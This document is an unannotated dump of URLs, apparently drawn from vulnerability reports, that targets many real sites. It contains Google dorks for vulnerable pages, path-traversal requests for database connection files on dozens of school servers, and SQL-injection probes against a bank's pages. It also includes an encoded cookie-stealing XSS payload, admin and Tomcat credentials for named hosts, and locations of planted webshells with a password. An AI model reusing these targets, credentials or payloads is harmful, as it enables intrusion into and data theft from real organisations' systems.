http://www.hhml.cn/news/newsview.asp?id=210 http://xn--brvs15ay9i.xn--fiqs8s/news/newsview.asp?id=203 http://fjmsyy.cn/newsview.asp?sid=2&id=8 http://www.3851885.com/NewsView.asp?ID=325&SortID=24 http://www.fjkx88.com/newsview.asp?sid=2&id=1 http://www.wpxfood.com/newsview.asp?sid=1&id=8 http://www.deniscn-gc.com/newsview.asp?id=324 http://www.xhmfoods.com/newsview.asp?sid=&id=15 http://www.deniscn-gc.com/productview.asp?id=537 http://www.fjycsp.com/Productview.asp?id=524&act= http://www.hlhmjj.com/productview.asp?id=512 http://yibinflowe.xm04.host.35.com/ProductView.asp?id=201&SortID=132 http://www.tiefengyp.com/ProductView.asp?ID=83&SortID=139 http://www.3851885.com/ProductView.asp?id=196&SortID=129 http://www.lhncp.com.cn/pro.asp?id=54 http://www.jwjmj.com/productshow.asp?id=83&mnid=6658&classname=%D2%A3%BF%D8%C6%F7&uppage=product.asp inurl:yeNewsInfo.asp?Id= http://www.knowehow.com/yeNewsInfo.asp?Id=121 http://www.choline-chloride.cn/yeNewsInfo.asp?id=244 http://www.hksunhoo.com/yenewsinfo.asp?id=154 http://www.tbib.cn/yeNewsInfo.asp?id=4 http://www.jsxinhui.com/kr/yeNewsInfo.asp?id=47 http://www.jiayitang.net/news/yeNewsInfo.asp?id=115 http://www.hengshengjb.com/yenewsinfo.asp?id=28 http://www.tovsh.com/yeNewsInfo.asp?id=48 http://www.rs-elec.com/yeNewsInfo.asp?id=82 http://www.ydigroup.com/gb/yenewsInfo.asp?id=3 http://www.reluex.com/YeNewsInfo.asp?id=115 http://www.hwksoft.com/system/yeNewsInfo.asp?id=59 http://www.cqtkjj.com/yeNewsInfo.asp?id=56 http://www.ancpa.org/YeNewsInfo.asp?id=112 http://www.wubuzhi.net/yeNewsInfo.asp?id=117 http://www2.zzu.edu.cn/art/yeNewsInfo.asp?id=188 http://www.ys-block.com.tw/yeNewsInfo.asp?id=6 http://www.jinruifen.cn/yeNewsInfo.asp?id=100 http://www.les.cn/yeNewsInfo.asp?id=91 http://www.secwatch.com.cn/yeNewsInfo.asp?id=62 http://www.0411ln.com/yeNewsInfo.asp?id=98 http://www.chinaceramics.com/yenewsInfo.asp?id=80 http://www.pkudl.cn:80/scetrain/index.asp http://www.hspost.com.cn/hspost.rar http://www.jhpx.com/ins_vip/show.asp?ID=102 http://office.cncnc.org//yuanban/login.php http://zhaosheng.cncnc.org/uploads/test78.php http://21sb.com/ http://ysxy.sicnu.edu.cn/main_web/admin/admin_index.asp URL:http://bbs.shouyou.com/forum.php?mod=viewthread&tid=153301&page=1&extra=#pid9009501 http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://5sing.kugou.com/shop/seller/serveinfo.html?sid=52d4eb0e8ead0e59380b2f9a http://210.73.83.146/lzjPrj/login.aspx http://210.73.83.146/LzjPrj/Files/registerFile/tempFile/286ecee2-d4cb-4546-b79e-d14fae67e070.aspx http://wxy.hqu.edu.cn/hqdx/xsdtx.asp?id=45 http://210.27.80.7/ http://plugins.zunyi.gov.cn/zfxxgk/zfxxgk/web/lawapply/lawapplyinfo.jsp?sysid=1&branchid=0 http://www.redcross.org.mo/en/news_full.php?no1=833 http://gprsb.ttkd.cn/ http://hnhp6660201.w215.bizcn.com/qghk_content.asp?id=13 http://admission.blcu.edu.cn/FCKeditor/_samples/default.html http://www.haitiansoft.com:8080/ http://www2.1756gps.com/ http://www.zbxsoft.com/ http://pub.mca.gov.cn/eform/form_get.jsp http://www.qzkj.net//admin_set.asp http://applistquery.wandoulabs.com/ http://ec.legendsec.com:8080/ http://ec.legendsec.com:8080/20141408031439.php http://ec.legendsec.com:8080/616.rar http://www.nxyqs.com/RecoverPasswd.aspx localhost:sqlmap http://sqlmap.org http://wooyun.org/bugs/wooyun-2014-055863 http://info.dzs.gov.cn/index.do?code={79121225-0000-0000-6A98-C4AF00000012}&templet=content_xxgkml http://60.10.19.139:8080/index.do?templet=content_xxgkzn&code=%7B20010000-FFFF-FFFF-A136-F20300000124%7D http://xxgk.laiyuan.gov.cn/index.do?templet=content_xxgkzn&code=%7BBDA60244-FFFF-FFFF-F80D-59A80000001C%7D http://www.wdzfgk.gov.cn/index.do?templet=content_xxgkzn&code=%7BDCC22573-FFFF-FFFF-E639-2B4D00000002%7D http://221.194.37.24:85/index.do?templet=content_xxgkgz&code=%7BDCC22518-FFFF-FFFF-B9A9-D85400000016%7D http://wooyun.org/bugs/wooyun-2014-073433 http://www.ycgjj.com/news/viewContent.jsp?id=111 http://mail.ikang.com/?q=resetpw进行密码重置,由于很多员工安全意识不足,导致密码找回问题很简单,比如“我是谁”,“我的手机号”等等可容易猜测的问题。 http://tiyan.sdo.com/userty/dataAjax.asp http://www.ikuaishou.com/ http://ikuaishou.51tv.com:80/user/user_login.jsp www.ikuaishou.com inurl:order.php?telphone= http://adm.anjuke.com/login.action http://optools.anjuke.com/admincp.php http://baoxiao.miaozhen.com/ http://baoxiao.miaozhen.com/WebServices/WebServiceSSOUser.asmx/GetUserList http://baoxiao.miaozhen.com/WebServices/WebServiceSSOUser.asmx?op=AddUser http://www.hhws.gov.cn是个洪湖市卫生和计划生育局 http://http://www.hhws.gov.cn/admin/login.jsp http://my.hb.189.cn/index.php?app=group_check&id=30 http://my.hb.189.cn/index.php?app=group_check&id=30 http://my.hb.189.cn/index.php?app=group_check&id=30 http://miaosha.shenzhenair.com/module/hyfw/inc_flightsegment.jsp http://www.hljhospital.net是黑龙江医院的,我看了注册信息是事业单位后台url:http://www.hljhospital.net/admin/login_admin.aspx http://www.wuhaifda.gov.cn/general/download.aspx?path=/web.config http://mall.cqcbank.com/ics-mallweb/MemberLogin.do?_locale=zh_CN&BankId=999999999999&LoginType=C http://gonggao.uibe.edu.cn http://gonggao.uibe.edu.cn/admin/,使用2#中得到的用户名密码登陆 http://oa.wuhansourcing.gov.cn http://oa.wuhansourcing.gov.cn:8188/admin/ http://oa.zjcof.com.cn//defaultroot/customize/UpFile.jsp http://221.7.246.44:7001//defaultroot/customize/UpFile.jsp http://oa.shenmojiaoyu.com:7001//defaultroot/customize/UpFile.jsp http://61.191.25.190:8080/osm2/adminInfo_login.action http://61.191.25.190/publicWL/member/main.htm http://moneypay.live.189.cn/ EV8Q0:16246:0:99999:7 SRrzBo1:16246:0:99999:7 http://www.guobin.net,开始还以为不是爱康国宾的站点,后来看一些标题信息觉得应该是国宾的分站: http://www.guobin.net/data/ http://bbs.lecai.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://zoo.baidu.com/video.html?id=10 http://dev.benbun.com/web/zoo2/zoo2api.php?callback=jQuery11110088873148465349_1415455233719&fun=get_all&vid=10&_=1415455233720 http://dev.benbun.com site:qunar.com 2.plus/recommend.php http://ieer.uibe.edu.cn/test78.php http://203.93.109.56/cqjtzhywxt/ http://203.93.109.56/console http://dy.lashou-inc.com/ http://www.cd-sr.com/install/ http://www.jiangningjx.com/install/ http://www.reachgroup.cn/install/ http://www.cnbestluck.com/install/ http://henwei.wm10.mingtengnet.com/install/ http://www.scwlrd.com/install http://thfw.wm10.mingtengnet.com/install/ http://www.hscatv.com/install/ http://www.mycsw.org/install/ http://61.185.224.55/console http://58.18.213.238/jwgl/public/download.asp?filename=../jwjs/conn/connstring.asp http://jiaowu.hustwenhua.net/public/download.asp?filename=../jwjs/conn/connstring.asp http://219.148.49.53/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://e.tjmvti.cn/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.2.229.222/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://bbs.hbpa.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://203.90.137.110/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://121.28.180.234/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://jiaowu.hncz.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://218.204.113.170/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://114.255.66.248/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.232.159.24/dhjw/public/download.asp?filename=../jwjs/conn/connstring.asp http://jw.mdjnu.cn/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.238.158.84/jw/public/download.asp?filename=../jwjs/conn/connstring.asp http://219.217.72.30/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://210.44.80.14/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://221.212.251.229/jiaowu2008/public/download.asp?filename=../jwjs/conn/connstring.asp http://jwxt.hnebp.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://61.183.19.35/public/download.asp?filename=../jwjs/conn/connstring.asp http://113.135.195.58/jiaowu_ylxy/public/download.asp?filename=../jwjs/conn/connstring.asp http://59.173.249.245/wljiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://202.194.86.187/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://jw.hljys.cn/public/download.asp?filename=../jwjs/conn/connstring.asp http://jiaowu.jljcxy.com/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp http://music.nchu.edu.cn/Uploadfiles/1.asp http://redmine.lashou-inc.com/ http://www.zkcz.gov.cn/userSites/zksczj/document.jsp?siteid=402881ce2da1ff8c012da2058fe90005 http://112.95.238.211:8080用户名:admin密码:123456就进去进去了 http://124.115.221.71/ http://guang.baidu.com/g/getinst?intPage=0&instid=5%27%20order%20by%201%20limit%200,1%23 http://gl.triolion.com/ http://oaf.yitoa.com:6688/ http://gl.triolion.com/wui/main.jsp?templateId=1 http://xxxxxx/background/festivalremind.php?ID=1 www.keepc.com/getRatesList.act https://ds3.research.microsoft.com http://211.151.175.48/loginact.php http://211.151.175.48/left.php http://211.151.175.48/usermanage/admin_adduser.php?id=2 http://www.fjsw.gov.cn/news.aspx?lmid=5 http://www.fjsw.gov.cn/topic/zxhl/index.aspx?ztid=5 http://log.zhenguanyu.com/gelf http://115.236.23.17:8080用户名:admin密码admin http://115.236.23.17:8080/jsp.jsp密码是:528998 http://www.gxgxw.gov.cn/CommunicateOnNet/Suggestions/SuggestionAdd.aspx?topicId=3 url:http://58.49.94.100:8000/manager/html user:tomcat pass:tomcat http://58.49.94.100:8000/HdIntegration/ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://www.ky-express.com/Jifen/articles.aspx?article=jifenjieshao http://www.ky-express.com/Chanpin/Default.aspx?article=dangtianda http://www.ky-express.com/News/ShowNews.aspx?article=800 http://www.ky-express.com/Jifen/GiftFenlei.aspx?class=8 www.8884321.com http://yun.myoa123.com/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3 http://yun.myoa123.com/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50 http://122.13.2.24:8080/login.asp http://old.ncu.edu.cn/cgi-bin/ncu/manage.pl?job=3&searchword=end&word=%D0%C2%CE%C5%D6%D0%D0%C4&username=master&password=newncuxb442433&key=news http://my.4399.com/game/list http://www.yihengkx.com/prosec.jsp?keyword=* http://www.shbo-xun.com/prosec.jsp?keyword=* http://jingkeleici.com/prosec.jsp?keyword=* http://www.aohaosiyq.com/prosec.jsp?keyword=* http://www.jinghongyq.com/prosec.jsp?keyword=* http://xsc.cuit.edu.cn/WebSite/Web/SearchList-Title~2014.html url:http://59.175.176.236:8000/manager/html user:tomcat pass:tomcat http://59.175.176.236:8000/super/ http://www.bztax.gov.cn/viewnews.aspx?id=470 http://www.bztax.gov.cn/article.aspx?classID=03 http://www.bztax.gov.cn/admin/ http://www.bztax.gov.cn/admin/index.asp http://imsfa.org/NewsContent.aspx?id=16 http://113.106.92.19/loginAccount.action http://www.haitiansoft.com:8080/ http://info.3g.qq.com/g/s?g_f=18449&g_ut=1&aid=gamezone_ss&id=gamezone_20120327000131 http://info.3g.qq.com/g/s?g_f=18449&g_ut=1&aid=gamezone_ss&id=gamezone_20140911012476 http://xw.qq.com/c/games/20140911012476 http://games.qq.com/a/20120327/000131.htm?pc http://act3.cq.qq.com/7162/work/show-id-109.html http://**.**.**/sgatconsult/login.jsp http://gzcx.tynu.edu.cn/KfWeb/admin/UserManager.aspx http://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspx http://www.cqvie.com/xfcxsq/admin/UserManager.aspx http://59.72.128.44/KfWeb/admin/UserManager.aspx http://cycwc.gzife.edu.cn/kefa//admin/UserManager.aspx http://www.shcdkf.com/kfweb/admin/UserManager.aspx http://home.gmw.cn/index.php http://cj.wyn88.com/ http://km.wyn88.com/ http://km.wyn88.com:9001/ http://km.wyn88.com:9001/spy.php password:angel http://218.2.102.178:8000/manager/html user:admin pass:admin http://218.77.183.130/platform/base/ul_ls.action http://demo.xdcms.cn/ http://food.nwsuaf.edu.cn/2013/clu.php?clu_id=3 http://www.hebeiroad.com/ http://xianguo.com/login http://www.zhihu.com/question/24715677 http://www.zhihu.com/question/23391000: http://tieba.baidu.com/p/2784747639 http://tieba.baidu.com/p/3375565083 http://tieba.baidu.com/p/2355041684: http://www.12306.cn/mormhweb/ggxxfw/wbyyzj/201106/srca12306.zip http://www.12306.cn/mormhweb/kyfw/question/201204/t20120427_701.html https://bidding.nottingham.edu.cn/upload5warn/css.jsp http://oa.travelzen.com/Users/Membership/LogOn http://61.156.3.138:8080/Unicom112/index.jsp http://61.156.3.138:8080/Unicom112/web.action;jsessionid=5EC6895CE331F3683CF9E76F62481088 http://career.huawei.com/recruitment/services/portal/portaluser/findFormData?formName=Portal_China_R_S_F&value={%22sf0951001407090%22:%22500001%22 http://www.jinanyiyuan.com/view.asp?id=1665 http://down.chinaz.com/soft/34989.htm https://ulb.ucloud.cn/api/ulb/createPort www.swjtu.edu.cn www.sicnu.edu.cn www.swust.edu.cn www.scu.edu.cn www.njtc.edu.cn www.sctu.edu.cn www.xcc.edu.cn www.scetc.edu.cn inurl:smalllist.asp?smallclassid= http://www.hblxcy.cn/smalllist.asp?smallclassid=185 http://lib.sdpt.com.cn:82/skzx/Smalllist.asp?SmallClassID=24 http://www.ylgtzy.gov.cn/smalllist.asp?smallclassid=220 http://www.hblxls.com/smalllist.asp?smallclassid=303 http://www.law900.com/smalllist.asp?smallclassid=142 http://ln.5210.cn/smalllist.asp?smallclassid=253 http://tz.10.gov.cn/smalllist.asp?smallclassid=285 http://www.tfxk.com http://www.lq22x.com/DangDetail.aspx?id=1901 http://www.lqycsxx.com/DangDetail.aspx?id=1821&pid=68 http://www.lq21xx.com/Teachers.aspx?pid=132 http://www.lq25x.com/News.aspx?pid=8 http://www.cdfrg.com/News.aspx?pid=147 http://www.*****.com/Administrator/admin_login.aspx http://www.*****.com/administrator/admin/add.aspx http://www.*****.com/administrator/administrator/admin/admin.aspx http://**.**.** http://et.airchina.com.cn/caapp/checkUserAction.action?lang=null&method=refund&rescode=【订单号】&time=1415585664068&hash=bca4cdfc485359515817bcbacd336979fc72dc76192639e3f018dc9f400c2209 http://nmcqjy.com/newsfb/sylist.asp?tbid=9764 http://press.fmmu.edu.cn/AdvanceQry.aspx?pid=190 http://kuaidadi.com/index/company.html?keywords=aaa http://weibo.cn/interface/***/***.php?ck=1&c=iphone&gsid=***&since_id=1;cat http://www.qibosoft.com//do/class.php?key=90sec http://117.184.99.117/masLoginLogicAction/login.action http://my.1ting.com/login http://my.1ting.com https://cn.teslamotors.com/cn/complete-basic-form http://www.actionsoft.com.cn/news/news.jsp?id=0076104161ed27483ba25f3f38488904&flag=mtbd http://wooyun.org/bugs/wooyun-2014-071907 http://discover.ie.sogou.com/status?h=&cmd=user_history&v=1 http://demo.dtcms.net/ http://demo.dtcms.net/user/message/show-1841.html http://www.gzbg100.cn/sysadmin/Login.aspx http://www.gzbg100.cn/sysadmin/Login.aspx http://www.517na.com http://www.stuh.com.cn/section.asp?page=1&sec_autoid=95 http://www.sycz.gov.cn/Arcticle_list.jsp?No_id=07 url:http://121.35.253.157:81/manager/html user:admin http://data.2366.com http://data.2366.com/addtion/getcalan_newk.php?op=searchRecommend&findTime=%2527 http://data.2366.com/addtion/getcalan_newk.php?op=searchRecommend&findTime=1 http://club.xywy.com/ www.188sc.cn/MoreList.aspx?Type=2 http://shop.qidian.com/ajax/StoreHandler.ashx?Method=loadstoreitem&pageindex=1&r=0.7435916543472558&sorttype=0&cate=-1&keyword=aaa http://www.xiaheng.net/ site:tt-art.com inurl:order site:gd.sina.com.cn http://www.esensoft.com.cn/ intitle:i@Report通用WEB网络报表平台 http://bug.focus.cn/login_page.php http://bug.focus.cn/my_view_page.php http://bug.focus.cn/bug_report_page.php http://lab.vogel.com.cn/ http://hyd.trade.qunar.com/ http://htj.trade.qunar.com/ http://www.cugb.edu.cn:80/research/kmoreInfo.action?smallClassID=12345&bigClassID=12345 http://www.cugb.edu.cn:80/profSearch.action?profname=88888 http://www.cugb.edu.cn:80/profhomeList.action?condition=88888 http://**.**.**/jspxxmgl/index.phpg=Home&m=Index&a=notice&id=30 http://**.**.**/tpd/ http://oa.998.com/login/Login.jsp http://www.sinorail.com/JobLists.aspx?ar= http://www.sinorail.com/admin inurl:xpCatalog_xpDesc.asp?action_key_order= inurl:shopxp_news.asp http://www.woaipf.com/ http://www.zao22.com/ http://www.gzwine.com.cn/ http://www.yndnjy.com/ http://www.zggzf.com/ http://www.outlanderex.com/ http://www.lecaimall.com/ http://61.141.236.9/ http://61.141.236.9/memadmin-1.0.12/memadmin/index.php?action=set.con http://61.141.236.9/redisadmin50/?import&s=0 http://61.141.236.9/phpMyAdmin/index.php?token=38ac6a0c4ad6e2c4ca6c76ad5e600669 https://accounts.ctrip.com/globalwap/account/login/ http://wenwen.sogou.com/z/q62913650.htm http://wooyun.org/bugs/wooyun-2010-053212 http://www.osrqd.com/HQWCMS/login_login.action http://www.osrqd.com/HQWCMS/login_login.action http://download.coolyun.com/NetWidget/app/app/tools/20140421093117/php.php inurl:mafen.asp?shuxing= http://221.181.233.195:10003/pl_add.asp?id=2009893541439.pdf http://218.92.71.5:1085/trebook/pl_add.asp?id=2009893541439.pdf http://www.zwxx.org/tushu/pl_add.asp?id=2009893541439.pdf http://220.170.135.156:88/dzts/pl_add.asp?id=2009893541439.pdf http://220.169.108.17:81/dzbook/pl_add.asp?id=2009893541439.pdf http://www.hssqjy.com/dzts/pl_add.asp?id=2009893541439.pdf http://www.zcool.com.cn/ https://github.com/ChadwickSun/devplatform/blob/2a805ffbf6f240d10a9a1a2efe858b0b0545a8ce/src/main/conf/.svn/text-base/mailConfig.properties.svn-base https://github.com/123389141/baibaiba/blob/3712d565337827159bf3d78718cca0b24e8d87d4/config.php http://59.173.7.146:7001/ebizweb/loginAction!onloadLogin.action http://59.173.7.146:7001/ebizweb/test1.jsp http://59.173.7.146:7001/ebizweb/jspspy2010.jsp http://gefco.cae.com.cn:443/Main.aspx https://github.com/huangmingqh/IES/blob/8ef1080ae9b9f54a978965ef50243bc07b60ae72/ies-project/ies-infrastructure/src/main/java/com/eshore/ies/infrastructure/common/EmailUtil.java http://114.215.124.129/get_news_content.php?id=123脚本没有加参数过滤,导致sql注入产生 https://e.boc.cn//ehome/SQISOFT/web/webNew/nSellorActivityDetail.aspx?SaID=SA0000000005%27%20AND%203*2*1%3d6%20AND%20%27000mX4u%27%3d%27000mX4u https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguan_news_detail.aspx?newsId=PN0000000017%27%20AND%203*2*1%3d6%20AND%20%27000VSRz%27%3d%27000VSRz http://219.143.**.**/ https://e.boc.cn//ehome/SQISOFT/web/webNew/nWuguan_service_detail.aspx?wuguanServeId=PT0000000019%27%20AND%203*2*1%3d6%20AND%20%27000PBig%27%3d%27000PBig http://xxxxxx/background/smsstatusreport.php?ID=1 inurl:mafen.asp?shuxing= http://61.175.231.112:8090/dzts/gl_tz_xian.asp?id=1547 http://221.181.233.195:10003/gl_tz_xian.asp?id=23 http://218.92.71.5:1085/trebook/gl_tz_xian.asp?id=23 http://www.zwxx.org/tushu/gl_tz_xian.asp?id=23 http://220.170.135.156:88/dzts/gl_tz_xian.asp?id=23 http://220.169.108.17:81/dzbook/gl_tz_xian.asp?id=23 http://www.hssqjy.com/dzts/gl_tz_xian.asp?id=23 https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260'and'1'='1返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nProductDetail.aspx?ProID=260'and'1'='2返回错误 http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231返回正常 http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231'and'1'='1返回正常 http://e.boc.cn/ehome/SQISOFT/web/webNew/nCommunityIndex.aspx?CommID=EC0000000231'and'1'='2返回错误 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080'and'1'='1返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000080'and https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058'and'1'='1返回正常 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000058'and'1'='2返回错误 https://e.boc.cn/ehome/service/shop/getShopListForPaging.json?code=88&codeType=province&page=0&pagesize=6&sort=%27PC1001%27&t=1415697252399 https://e.boc.cn/ehome/service/shop/getShopListForPaging.json?code=88%27%20and%20%271%27=%271&codeType=province&page=0&pagesize=6&sort=%27PC1001%27&t=1415697252399 https://e.boc.cn/ehome/service/shop/getShopListForPaging.json?code=88%27%20and%20%271%27=%272&codeType=province&page=0&pagesize=6&sort=%27PC1001%27&t=1415697252399 http://www.bankofbbg.com/portal/index.htm http://**.**.**/portal/rc/zxzp/A091902index_1.htm http://**.**.**/cms/hireonline/viewpic.jsp www.bankofbbg.com//portal/hrpic/1403598551582964.jsp http://www.dqyzj.com/shownew.aspx?id=135 inurl:mafen.asp?shuxing= http://221.181.233.195:10003/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://218.92.71.5:1085/trebook/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://www.zwxx.org/tushu/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://220.170.135.156:88/dzts/ping_hao.asp?fenlei=&mingcheng=357950 http://220.169.108.17:81/dzbook/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 http://www.hssqjy.com/dzts/ping_hao.asp?fenlei=%D1%A7%D0%A1%CB%B5&mingcheng=357950 https://github.com/123389141/baibaiba/blob/3712d565337827159bf3d78718cca0b24e8d87d4/config.php https://github.com/123389141/baibaiba/blob/3712d565337827159bf3d78718cca0b24e8d87d4/home.php http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://www.fhredcross.org.cn/Donations.aspx?ParentCode=0004&NodeCode=00040001 http://mba.fjnu.edu.cn/sxw/View.aspx?id=67注入点在这 https://60.216.5.94/ http://www.haitiansoft.com:8080/ http://**.**.** http://**.**.** http://**.**.**/vos http://**.**.**/oa http://**.**.** http://180.169.46.89/main.php http://www.aino.hk http://218.22.33.234:8050/,HealthReport对应体检报告、Upload对应体检用户信息 http://zsb.hunnu.edu.cn/UploadFiles/20141110225949614.asp http://116.228.55.189:8887/secs/loginAction.do?action=login http://cwch.ahu.edu.cn/querynetweb/admin/admin_loginInfo.aspx http://www.cqvie.com/xfcxsq/admin/admin_loginInfo.aspx http://59.72.128.44/KfWeb/admin/admin_loginInfo.aspx http://cycwc.gzife.edu.cn/kefa//admin/admin_loginInfo.aspx http://gzcx.tynu.edu.cn/KfWeb/admin/admin_loginInfo.aspx http://www.shcdkf.com/kfweb//admin/admin_loginInfo.aspx http://www.sptdch.cn:8080/happy/reportsearch.asp http://www.wowsai.com/dynamic http://ea.ehuatai.com/ http://ea.ehuatai.com/invoker/JMXInvokerServlet http://jf.ztgame.com/do_buy.php http://shop.ehuatai.com/isale/risk/casualtyInsuranceAction-initToInformation.action http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_grouplist.jsp?groupid=jsearch&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_grouplist.jsp?groupid=jsearch&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_grouplist.jsp?groupid=jsearch&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_groupuserlist.jsp?groupid=1&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://www.taojiang.gov.cn/jcms/workflow/objectbox/selectx_grouplist.jsp?groupid=1&changetype=1 http://sha.sinotrans.com/jsearch/objectbox/selectx_groupuserlist.jsp?groupid=jsearch&changetype=1 http://xxgk.lucheng.gov.cn/xxgk/workflow/objectbox/selectx_grouplist.jsp?groupid=1&changetype=1 http://www.wugang.gov.cn/jis/objectbox/selx_grouplist.jsp?groupid=1&changetype=1 http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://t9.go2oa.com/t9/t9/core/funcs/message/weixun_share/act/T9WeiXunShareAct/getWeiXunById.act http://218.242.43.114 http://218.242.43.30 http://210.32.33.160/idl/ZTClassNav.aspx?majorcode=r http://219.223.211.23//ZTClassNav.aspx?majorcode=r http://xwlw.zju.edu.cn/idl/ZTClassNav.aspx?majorcode=r http://219.244.185.22/idl//ZTClassNav.aspx?majorcode=r http://papers.libmill.com/ZTClassNav.aspx?majorcode=r http://202.204.190.31//ZTClassNav.aspx?majorcode=r http://202.115.72.1/idl/ZTClassNav.aspx?majorcode=r http://202.197.107.11:86/idl30//ZTClassNav.aspx?majorcode=r http://qhbfm.jiehr.com.cn//ZTClassNav.aspx?majorcode=r http://sjzcxqur.jiehr.com.cn/ZTClassNav.aspx?majorcode=r http://210.27.181.210//ZTClassNav.aspx?majorcode=r http://202.194.153.155/idl//ZTClassNav.aspx?majorcode=r http://59.73.126.135/idl/ZTClassNav.aspx?majorcode=r http://papers.libmill.com/ZTClassNav.aspx?majorcode=r http://papers.libmill.com/ZTClassNav.aspx?majorcode=r http://qhbfm.jiehr.com.cn//ZTClassNav.aspx?majorcode= http://210.27.181.210//ZTClassNav.aspx?majorcode=r http://202.194.153.155/idl//ZTClassNav.aspx?majorcode inurl:getlist.asp?pmid= http://www.jxgcxy.tzc.edu.cn/sy/acritever.asp?pmid=132&fmid=154&id=156 http://5sing.kugou.com/my/message/note(站内短信) http://58.56.128.4:88/tiss2/ http://123.234.41.10:88/TISS/login.aspx www.cqbdyg.com,如图: http://tg.tttuangou.net http://film.spider.com.cn/cinema-44003301/?filmId=201411366068&showDate=2014-11-08&#p=1 http://202.100.22.236/usermanager.asp https://github.com/dly1986/brother/blob/master/protected/config/console.php http://brother.toursforfun.com http://60.247.104.99/ http://service.ehuatai.com/ http://app.junph.com/Shopping/OrderDetail.aspx?OrderCode=2014111103452 site:189.cn inurl:order http://shop.zcool.com.cn http://www.crecgi.com/?resultsshow/tp/235/id/14*.html http://www.lorealprofessionnel.com.cn/product/product.aspx?sort=3&pr_id=2 http://list.taobao.com/itemlist/default.htm?json=on&atype=b&cat=50026909 https://wen.lu/?#q=site:taobao.com+%22status%22:+%7B+%22code%22:+%22200%22+,+%22url%22:+%22%22+%7D http://store.taobao.com/shop/view_shop.htm?user_number_id=144161231&ssid=r11 http://jianghu.taobao.com/u/MTQ0MTYxMjMx/front.htm http://my.taobao.com/UvFQ0vFxYvCvY, http://rate.taobao.com/user-rate-UvFQ0vFxYvCvY.htm http://its.chinatax.gov.cn/common/FCKeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/&NewFolderName=qing http://its.chinatax.gov.cn/UploadFiles/File/xm1.jsp http://its.chinatax.gov.cn/xml/list_notice.jsp http://210.32.33.160/idl/LookPostilstr.aspx?stuid=0 https://www.sjz12333.gov.cn/ user:superman pass:talent http://bbs.os.baidu.com/forum.php http://bbs.os.baidu.com/uc_server/ http://www.qlsafety.gov.cn/gwcs/qtdisp.asp?disp_id=1104 http://www.qlsafety.gov.cn/gwcs/in_file.asp?file_name=1.asp http://gx.10086.cn:80/dudao/validateAction.action http://www.ztyb.com/ztsi/index.jsp 